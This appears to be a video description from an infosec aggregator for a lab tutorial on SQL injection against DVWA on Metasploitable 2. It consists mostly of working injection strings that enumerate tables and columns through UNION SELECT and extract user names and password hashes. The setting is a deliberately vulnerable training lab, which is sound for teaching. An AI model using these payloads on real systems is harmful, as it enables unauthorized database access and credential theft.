Description: In this video I will show you how to use SQL Injection queries for exploitation a database for usersname and hash. Iām using DVWA with low level security. Use Metasploitable ā 2 for DVWA.
SQL Injection queries : -
1' and 1=1#
1' and 1=1 order by 2 #
'or' 1=1ā
1' and 1=0 union select null,table_name from information_schema.tables#
1' and 1=0 union select null,table_name from information_schema.columns where table_name='users' #
1' and 1=0 union select null,concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users' #
1' and 1=0 union select null,concat(first_name,0x0a,password) from users #
1 and 1=0 union select table_name, column_name from information_schema.columns where table_name=0x7573657273
Tags: sql-injection , hacking , hack , exploitation , dvwa , web-app ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.